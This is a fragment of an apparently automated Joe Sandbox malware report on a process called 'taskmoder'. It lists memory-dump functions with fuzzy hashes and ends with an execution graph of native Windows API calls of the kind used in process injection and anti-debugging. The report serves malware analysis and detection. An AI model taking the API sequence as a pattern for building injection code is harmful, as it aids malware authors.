                                                                                        • Snapshot File: hcaresult_31_2_2920000_taskmoder.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 210fb796b5b8c772cdbebfd43ddcfa3c879691387913423f07e4c4dc99d0afec
                                                                                        • Instruction ID: aed1c4132c440695fe5da1b7a75ab69875410885a9082e2d6ed437b3849bd548
                                                                                        • Opcode Fuzzy Hash: 210fb796b5b8c772cdbebfd43ddcfa3c879691387913423f07e4c4dc99d0afec
                                                                                        • Instruction Fuzzy Hash: 3BE0C231249740BFE7124FA48C01BD13F32EF6A710F0081AAF281CE2E2DA338812C361
                                                                                        Function 0292DFE0 Relevance: .0, Instructions: 13COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000001F.00000002.3016913606.0000000002920000.00000040.00000800.00020000.00000000.sdmp, Offset: 02920000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_31_2_2920000_taskmoder.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: a842152daf3577cfdd50407b3feacbec427f1ccf0bf66576fc55ba964b0162c4
                                                                                        • Instruction ID: 1eab624ea480a3368ad1975d391e40402ca9bae82d1d344a73c8b86167c2caec
                                                                                        • Opcode Fuzzy Hash: a842152daf3577cfdd50407b3feacbec427f1ccf0bf66576fc55ba964b0162c4
                                                                                        • Instruction Fuzzy Hash: 80C0123624020877EB155A909C02FA63A29D744B10F10C025B605480D0C573D4115754
                                                                                        Function 02925C00 Relevance: .0, Instructions: 8COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000001F.00000002.3016913606.0000000002920000.00000040.00000800.00020000.00000000.sdmp, Offset: 02920000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_31_2_2920000_taskmoder.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 7da22269a4a1d3d00504e45f07153fc739f031877d5183c922f04383f2cf3c5f
                                                                                        • Instruction ID: 993039568dcb7f5a52e3721b283b7b6156cfddc4ef183ee08aebc5de5fba39ce
                                                                                        • Opcode Fuzzy Hash: 7da22269a4a1d3d00504e45f07153fc739f031877d5183c922f04383f2cf3c5f
                                                                                        • Instruction Fuzzy Hash: 21C080B010CBC06FD31243304D24B48FF127F55B01F0601DDD58805493C29510B0D359
                                                                                        Function 02925451 Relevance: .0, Instructions: 7COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000001F.00000002.3016913606.0000000002920000.00000040.00000800.00020000.00000000.sdmp, Offset: 02920000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_31_2_2920000_taskmoder.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: d08f17ca00c0d2b34224a64528f70774cdabca35a4210f5a8b95be267826ac76
                                                                                        • Instruction ID: b4b4f8a1c49247b27a840274ed335031bad1f9ea3d03e71683db8f9e1d60311e
                                                                                        • Opcode Fuzzy Hash: d08f17ca00c0d2b34224a64528f70774cdabca35a4210f5a8b95be267826ac76
                                                                                        • Instruction Fuzzy Hash: 50C04C609087918FDA8597384868381FF61BF85505F0C869E949641517DB685452D644

                                                                                        Non-executed Functions

                                                                                        Function 00A015A8 Relevance: 2.6, Strings: 2, Instructions: 65COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000001F.00000002.2880671343.0000000000A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A00000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_31_2_a00000_taskmoder.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 4']q$4']q
                                                                                        • API String ID: 0-3120983240
                                                                                        • Opcode ID: 151d18e3abb4d591c7b283d0cd590ddcf37d11afa02ef6f96d75b8b8fda36214
                                                                                        • Instruction ID: 82721a30e67fa3fa441e5618c203413593807b55cae7cf1d9835013cfecf02c8
                                                                                        • Opcode Fuzzy Hash: 151d18e3abb4d591c7b283d0cd590ddcf37d11afa02ef6f96d75b8b8fda36214
                                                                                        • Instruction Fuzzy Hash: 4A21AC70D0820D9FCB1ACFA8E9405EEBBB0EF46300F1041AAD415AB291D7319E01CB62
                                                                                        Function 00A015C0 Relevance: 2.5, Strings: 2, Instructions: 43COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000001F.00000002.2880671343.0000000000A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A00000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_31_2_a00000_taskmoder.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 4']q$4']q
                                                                                        • API String ID: 0-3120983240
                                                                                        • Opcode ID: 83a57b40f75dbda1e24ab05befdd94d88f11b5fcb7e9ce98a21d2c175cb362cb
                                                                                        • Instruction ID: 70aa3ac0a601a7a0902dba3801d48ef32099d9e1dd77575a4432d103a3a110e4
                                                                                        • Opcode Fuzzy Hash: 83a57b40f75dbda1e24ab05befdd94d88f11b5fcb7e9ce98a21d2c175cb362cb
                                                                                        • Instruction Fuzzy Hash: 9501C2B4E0420DAFCB08DFA8D940AAEBBF4BB45300F2085AAD815A7290D7319E00DB55
                                                                                        Function 00A011E0 Relevance: 2.5, Strings: 2, Instructions: 40COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000001F.00000002.2880671343.0000000000A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A00000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_31_2_a00000_taskmoder.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: $]q$$]q
                                                                                        • API String ID: 0-127220927
                                                                                        • Opcode ID: 591e46eb3ce60172d0914141956444e9ca5489b4281b0b0b8da2ca12ea2d806a
                                                                                        • Instruction ID: ca014d7baf45e1bd971f730817f06ea84ae8ff46ac945d3002061cae59c19e2c
                                                                                        • Opcode Fuzzy Hash: 591e46eb3ce60172d0914141956444e9ca5489b4281b0b0b8da2ca12ea2d806a
                                                                                        • Instruction Fuzzy Hash: 0701C4B4E0421DDFCB54DFE8E9406FEBBF4BB09300F1055AAD814A3290D7349A40DB55
                                                                                        Function 00A0095C Relevance: 1.3, Strings: 1, Instructions: 63COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000001F.00000002.2880671343.0000000000A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A00000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_31_2_a00000_taskmoder.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: $]q
                                                                                        • API String ID: 0-1007455737
                                                                                        • Opcode ID: 7f47fd2703f51b3e2b7242ac5c08099dbd46e354f8996bdd5aa99f101c8934f3
                                                                                        • Instruction ID: e6b24a00efd4a259248ee003c02a955301c28f36ff8181d5c18f61302bfdd99c
                                                                                        • Opcode Fuzzy Hash: 7f47fd2703f51b3e2b7242ac5c08099dbd46e354f8996bdd5aa99f101c8934f3
                                                                                        • Instruction Fuzzy Hash: 51213470D0920CEFDB15CFA8E484BAEBBB0FB06301F6085EAD455A7292D3745A41CF45
                                                                                        Function 00A011CB Relevance: 1.3, Strings: 1, Instructions: 45COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000001F.00000002.2880671343.0000000000A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A00000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_31_2_a00000_taskmoder.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: $]q
                                                                                        • API String ID: 0-1007455737
                                                                                        • Opcode ID: 0c0b881ee143af5d15685f59cc419d4b0a5493c9623ad33a10edd14986566da7
                                                                                        • Instruction ID: 040b16899fa41b66b841e61b2d900dd247792f8c1ad4e4659fa145d2e3006a87
                                                                                        • Opcode Fuzzy Hash: 0c0b881ee143af5d15685f59cc419d4b0a5493c9623ad33a10edd14986566da7
                                                                                        • Instruction Fuzzy Hash: 23011070D0825D9FCB56CFA8E8406FDBBF0BB0A300F1142AAD814E7292E3384A41CB52
                                                                                        Function 02922E81 Relevance: .1, Instructions: 86COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000001F.00000002.3016913606.0000000002920000.00000040.00000800.00020000.00000000.sdmp, Offset: 02920000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_31_2_2920000_taskmoder.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 8ac3b06acb5c14c4c802fdcbc45f96e17b76aa4e8c27fceb9e3c3b527670719c
                                                                                        • Instruction ID: 3092acc2b9854f009bea77da84d4f7789c396681a901877cd5b38e6abbdf1c4d
                                                                                        • Opcode Fuzzy Hash: 8ac3b06acb5c14c4c802fdcbc45f96e17b76aa4e8c27fceb9e3c3b527670719c
                                                                                        • Instruction Fuzzy Hash: C231EEB4D002588FCB10CFA9D984AEEBBB0AF49314F14806AE809B7251C7395945CFA5
                                                                                        Function 02922E98 Relevance: .1, Instructions: 79COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000001F.00000002.3016913606.0000000002920000.00000040.00000800.00020000.00000000.sdmp, Offset: 02920000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_31_2_2920000_taskmoder.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: fe5c91843090e8fabe86c31f8ae368a68dcadc6b1b2f6171de33d1c74f1e5ea7
                                                                                        • Instruction ID: 70e53b12ee443bf5d00b62665bce0839992a8dc7c4ebdb0baffcfa22f399413d
                                                                                        • Opcode Fuzzy Hash: fe5c91843090e8fabe86c31f8ae368a68dcadc6b1b2f6171de33d1c74f1e5ea7
                                                                                        • Instruction Fuzzy Hash: B731BEB4D002189FCB10DFA9D985AEEFBF5BB49314F14802AE818B7244C739A945CFA5
                                                                                        Function 00A01134 Relevance: .1, Instructions: 51COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000001F.00000002.2880671343.0000000000A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A00000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_31_2_a00000_taskmoder.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 64cd4f6f5a2f389f6c52bec1a3ed7bdf0912af9630816c869fe97ea08d4ff060
                                                                                        • Instruction ID: 11e994a13ac6a109dcc71129c0bf5f3b46b9066a82cbae4c38c2278a33206e17
                                                                                        • Opcode Fuzzy Hash: 64cd4f6f5a2f389f6c52bec1a3ed7bdf0912af9630816c869fe97ea08d4ff060
                                                                                        • Instruction Fuzzy Hash: AB11FA70D092499FCB56CFA8D8546EDBFB0BF0A310F1541EAD555E72A2D3348E01CB66
                                                                                        Function 00A00C9B Relevance: .0, Instructions: 47COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000001F.00000002.2880671343.0000000000A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A00000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_31_2_a00000_taskmoder.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: e9a1fb785f9de2a43d2e717d2de4d5a1522c0732978e1da39c0da4d9e7db45c8
                                                                                        • Instruction ID: 73b1c533e903b71dd663354cc79627a97e581ff2f583ae1759868880ca422e4b
                                                                                        • Opcode Fuzzy Hash: e9a1fb785f9de2a43d2e717d2de4d5a1522c0732978e1da39c0da4d9e7db45c8
                                                                                        • Instruction Fuzzy Hash: FA0169B0D48288DFDB01CBB8E450ABDBFB0FB06300F6046AAC450A7292C3744A15CB05
                                                                                        Function 00A00C13 Relevance: .0, Instructions: 43COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000001F.00000002.2880671343.0000000000A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A00000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_31_2_a00000_taskmoder.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 8a4d53fe2d676d7f2e6e74166846760978189f1291c82d418336d04ac15d2767
                                                                                        • Instruction ID: 91cc2486a9fa031cc5bcd25841eb589bcad5bda0cc08801bce143be60f2be6c4
                                                                                        • Opcode Fuzzy Hash: 8a4d53fe2d676d7f2e6e74166846760978189f1291c82d418336d04ac15d2767
                                                                                        • Instruction Fuzzy Hash: A00178B0C09288DFDB16CFA8E480BBDBFB0AF06301F6446EAC054A72A2C3754A45DF45
                                                                                        Function 00A009E3 Relevance: .0, Instructions: 42COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000001F.00000002.2880671343.0000000000A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A00000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_31_2_a00000_taskmoder.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 1565be5e9ef78e01cd574c582ca8faa09fe78caa49f50fc34dc80c4e2781fffd
                                                                                        • Instruction ID: 7361d17129877223239a5b4fbf309a6b930243e78d7db9fdad58af6686efcadf
                                                                                        • Opcode Fuzzy Hash: 1565be5e9ef78e01cd574c582ca8faa09fe78caa49f50fc34dc80c4e2781fffd
                                                                                        • Instruction Fuzzy Hash: 77011670E09348DFCB16CFA89455BFDBFB0AB06300F1485EAE054A72A2D3744A45DB45
                                                                                        Function 00A01150 Relevance: .0, Instructions: 42COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000001F.00000002.2880671343.0000000000A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A00000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_31_2_a00000_taskmoder.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 3c1d42a83be771f0006b0ade49e55fb4ed19a9033e62a5cf0c523870a6a4b011
                                                                                        • Instruction ID: 07c580cab7f9759651fd855462119c7876ca04aa223dd6458a9ffef05b202c9c
                                                                                        • Opcode Fuzzy Hash: 3c1d42a83be771f0006b0ade49e55fb4ed19a9033e62a5cf0c523870a6a4b011
                                                                                        • Instruction Fuzzy Hash: DD0192B4E0421DDFCB44DFA8D984AAEBBF4BB09304F1045A9E915A7390D7309A40DB55
                                                                                        Function 00A00D24 Relevance: .0, Instructions: 41COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000001F.00000002.2880671343.0000000000A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A00000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_31_2_a00000_taskmoder.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 48a9cf031ee865025983ef033238d4e22286b301e97579502997a28164797278
                                                                                        • Instruction ID: 3ea65305db935a279efc5fa59fd63288a89ab99d2fe7ec30410d6703e6e5e815
                                                                                        • Opcode Fuzzy Hash: 48a9cf031ee865025983ef033238d4e22286b301e97579502997a28164797278
                                                                                        • Instruction Fuzzy Hash: C9014B70D09288DFCB55DFF8D440BBEBFB0AB06301F1086DAD014A72A2D3B49A44DB65
                                                                                        Function 00A00BA0 Relevance: .0, Instructions: 39COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000001F.00000002.2880671343.0000000000A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A00000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_31_2_a00000_taskmoder.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: e5452be4e97ee00aed68a15ad5460450f860db916c8e2849c95fa6266cbdf124
                                                                                        • Instruction ID: 4f0c5fab87ab889d65393c0143b727408edb21343c9903038f9531989ef2ec5b
                                                                                        • Opcode Fuzzy Hash: e5452be4e97ee00aed68a15ad5460450f860db916c8e2849c95fa6266cbdf124
                                                                                        • Instruction Fuzzy Hash: A301F6B4E0820DEFCB04DFA9E444AAEFBB4FB06304F5095AAD414A7290D7749A40DB54
                                                                                        Function 00A00CB0 Relevance: .0, Instructions: 39COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000001F.00000002.2880671343.0000000000A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A00000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_31_2_a00000_taskmoder.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: e4554838d8ed7cb7c858fcfcd288cd921949812640734885b340a60f66a8e29f
                                                                                        • Instruction ID: 8353cd964f94d867d3a4e61bdc01fcea7b240854fb3c469b99861d376faadcca
                                                                                        • Opcode Fuzzy Hash: e4554838d8ed7cb7c858fcfcd288cd921949812640734885b340a60f66a8e29f
                                                                                        • Instruction Fuzzy Hash: 2001F6B0D4420CEFDB44DFA8E444ABDBBB4FB05300F5086AAD820B3290D7749A50DB49
                                                                                        Function 00A009F8 Relevance: .0, Instructions: 39COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000001F.00000002.2880671343.0000000000A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A00000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_31_2_a00000_taskmoder.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: d536db8233a892139df2e509df85e7b7a6a1eaaaf5f4f11feb34cb3260bde251
                                                                                        • Instruction ID: ae94c5bfaf83b979760957c1fc0ff9c8c417a2890fd1df9c146bd922452cd61f
                                                                                        • Opcode Fuzzy Hash: d536db8233a892139df2e509df85e7b7a6a1eaaaf5f4f11feb34cb3260bde251
                                                                                        • Instruction Fuzzy Hash: BA01F674E0820CEFCB14DFA8E444AADBBB0FB45300F5085A9D824A3290D7B49A40DB85
                                                                                        Function 00A00C28 Relevance: .0, Instructions: 39COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000001F.00000002.2880671343.0000000000A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A00000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_31_2_a00000_taskmoder.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: ac93a1d721e5d730b19f6b48d02ed7507d184cb58739fa4e2c1e1f31192f1e06
                                                                                        • Instruction ID: dc95650b42e518151990242673541181a47090bf8f2685bed6efe9e463b86323
                                                                                        • Opcode Fuzzy Hash: ac93a1d721e5d730b19f6b48d02ed7507d184cb58739fa4e2c1e1f31192f1e06
                                                                                        • Instruction Fuzzy Hash: 0501FB70D0420CEFDB14DFA8D444AADBBB0FB05301F5086AAD814A3250D7749A40DB45
                                                                                        Function 00A00D38 Relevance: .0, Instructions: 39COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000001F.00000002.2880671343.0000000000A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A00000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_31_2_a00000_taskmoder.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 805529407045b03a0f9951f23f55ec6c636d9a6c83e617c4cc0d38f5731d836e
                                                                                        • Instruction ID: 9033f5dbaed85bc7c2ac8f32854ac1c7e754362f845320f7161d5eb576ce86bd
                                                                                        • Opcode Fuzzy Hash: 805529407045b03a0f9951f23f55ec6c636d9a6c83e617c4cc0d38f5731d836e
                                                                                        • Instruction Fuzzy Hash: 2901FB74D0420CEFCB14DFE8D444BADBBB0FB05301F5085A9D814A3250D774AA40DB95
                                                                                        Function 00A00970 Relevance: .0, Instructions: 39COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000001F.00000002.2880671343.0000000000A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A00000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_31_2_a00000_taskmoder.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: f9188e2a011223c4afb8a19385ee29edf8f055ddf3357ab19258dce08493037e
                                                                                        • Instruction ID: 1bfaa469eaa691980ee6ad8f5c72e154f702df27894dbc448c9e3a7b31df75c2
                                                                                        • Opcode Fuzzy Hash: f9188e2a011223c4afb8a19385ee29edf8f055ddf3357ab19258dce08493037e
                                                                                        • Instruction Fuzzy Hash: 2C01F670D1420CEFDB04DFA8E544AAEB7B4FB45300F9095A9D454A3391D7749A40DB85
                                                                                        Function 00A001B0 Relevance: 5.1, Strings: 4, Instructions: 58COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000001F.00000002.2880671343.0000000000A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A00000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_31_2_a00000_taskmoder.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 4']q$4']q$$]q$$]q
                                                                                        • API String ID: 0-978391646
                                                                                        • Opcode ID: 8125780b545fda7d51a191a707b65f27355fbaca3811ff797a8b370dd8eb232e
                                                                                        • Instruction ID: 6ceceb5358b59dbc5ae88b22a424e4942171b49f92a4ce6a4d90e6eba5151e17
                                                                                        • Opcode Fuzzy Hash: 8125780b545fda7d51a191a707b65f27355fbaca3811ff797a8b370dd8eb232e
                                                                                        • Instruction Fuzzy Hash: 2A21EA30A4421CEFCB18DFA8E598BEDBBB5BF48301F608595D915AB294C7349E80DB81
                                                                                        Function 00A018B8 Relevance: 5.0, Strings: 4, Instructions: 47COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000001F.00000002.2880671343.0000000000A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A00000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_31_2_a00000_taskmoder.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: $]q$$]q$$]q$$]q
                                                                                        • API String ID: 0-858218434
                                                                                        • Opcode ID: e884392bbe87d21b4f5cf75e4dc1e8e3a139329af4f29c23effc1632cb6f3a80
                                                                                        • Instruction ID: d933d06eff4a7124071eb3762aba9c87fa1403a0aa6b123edc609b73431eeff6
                                                                                        • Opcode Fuzzy Hash: e884392bbe87d21b4f5cf75e4dc1e8e3a139329af4f29c23effc1632cb6f3a80
                                                                                        • Instruction Fuzzy Hash: 5311E370E0020DEFCB29DFA9E5546EDBBF0BB04301F2085AAD855A7280D7349A40CB91
                                                                                        Function 00A01968 Relevance: 5.0, Strings: 4, Instructions: 47COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000001F.00000002.2880671343.0000000000A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A00000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_31_2_a00000_taskmoder.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: $]q$$]q$$]q$$]q
                                                                                        • API String ID: 0-858218434
                                                                                        • Opcode ID: a864c8d559a65dd37aa7c02aa4dd7b9fd5fedf5c1215f76058f78e46e42c28d4
                                                                                        • Instruction ID: 20ca944abf380c61cc7096f10403367f9005d605947b94d0f4b2f42c3020821d
                                                                                        • Opcode Fuzzy Hash: a864c8d559a65dd37aa7c02aa4dd7b9fd5fedf5c1215f76058f78e46e42c28d4
                                                                                        • Instruction Fuzzy Hash: 1711F870E0020DDFCB18CFA9D5946EDBBF0BB04340F204996D891A7390D7345E40CB91
                                                                                        Function 00A01378 Relevance: 5.0, Strings: 4, Instructions: 47COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000001F.00000002.2880671343.0000000000A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A00000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_31_2_a00000_taskmoder.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: $]q$$]q$$]q$$]q
                                                                                        • API String ID: 0-858218434
                                                                                        • Opcode ID: 0ef12e28b1ea8b7acbb2042dfbb703ac27ee3f7e6b0c7923e1370b744ba88d54
                                                                                        • Instruction ID: d851e83dca1997fd8998e344d8fb62dfb0f19ba0e9b9fe717f5a2e364c6ee77d
                                                                                        • Opcode Fuzzy Hash: 0ef12e28b1ea8b7acbb2042dfbb703ac27ee3f7e6b0c7923e1370b744ba88d54
                                                                                        • Instruction Fuzzy Hash: 97112774E0020CEFCB58DF98E584AEDB7F5FB04300F608999D815AB690D7306E40EB42
                                                                                        Function 00A003E0 Relevance: 5.0, Strings: 4, Instructions: 46COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000001F.00000002.2880671343.0000000000A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A00000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_31_2_a00000_taskmoder.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: P[]q$P[]q$$]q$$]q
                                                                                        • API String ID: 0-774459732
                                                                                        • Opcode ID: 40dbcfc3adbdcec63a8a13dae2241b09628fe188b4fcdb063923f5b53e371b14
                                                                                        • Instruction ID: e06ce4ec12aa9532f3e06a18910d48aaac5a172aa347394daa6b0b99efedabd7
                                                                                        • Opcode Fuzzy Hash: 40dbcfc3adbdcec63a8a13dae2241b09628fe188b4fcdb063923f5b53e371b14
                                                                                        • Instruction Fuzzy Hash: 72111234E0020CEFCB18DFA8E594BACBBB0FB04301F6084A9D915A7391C771AE40DB49

                                                                                        Execution Graph

                                                                                        Execution Coverage:30%
                                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                                        Signature Coverage:0%
                                                                                        Total number of Nodes:33
                                                                                        Total number of Limit Nodes:0
                                                                                        execution_graph 21642 553b990 21643 553b9d4 NtSetInformationThread 21642->21643 21645 553ba41 21643->21645 21654 553c6c0 21655 553c70f NtCreateSection 21654->21655 21657 553c79d 21655->21657 21670 553cab0 21671 553caf9 NtQueryVolumeInformationFile 21670->21671 21673 553cb71 21671->21673 21674 553c920 21675 553c96c NtMapViewOfSection 21674->21675 21677 553ca2f 21675->21677 21646 553cbd8 21647 553cc21 NtDeviceIoControlFile 21646->21647 21649 553ccd0 21647->21649 21650 553bb98 21651 553bbe7 NtProtectVirtualMemory 21650->21651 21653 553bc5f 21651->21653 21658 553c588 21659 553c5d7 NtOpenFile 21658->21659 21661 553c65a 21659->21661 21662 553c808 21663 553c851 NtQuerySystemInformation 21662->21663 21665 553c8be 21663->21665 21666 553bcc8 21667 553bd14 NtAllocateVirtualMemory 21666->21667 21669 553bd97 21667->21669 21678 553b868 21679 553b8b1 NtQueryInformationProcess 21678->21679 21681 553b929 21679->21681 21682 553baa8 21683 553baec NtClose 21682->21683 21685 553bb38 21683->21685

                                                                                        Executed Functions

                                                                                        Function 0553C919 Relevance: 1.6, APIs: 1, Instructions: 145nativeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • NtMapViewOfSection.NTDLL(?,?,?,?,?), ref: 0553CA1D
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000020.00000002.4688817483.0000000005530000.00000040.00000800.00020000.00000000.sdmp, Offset: 05530000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
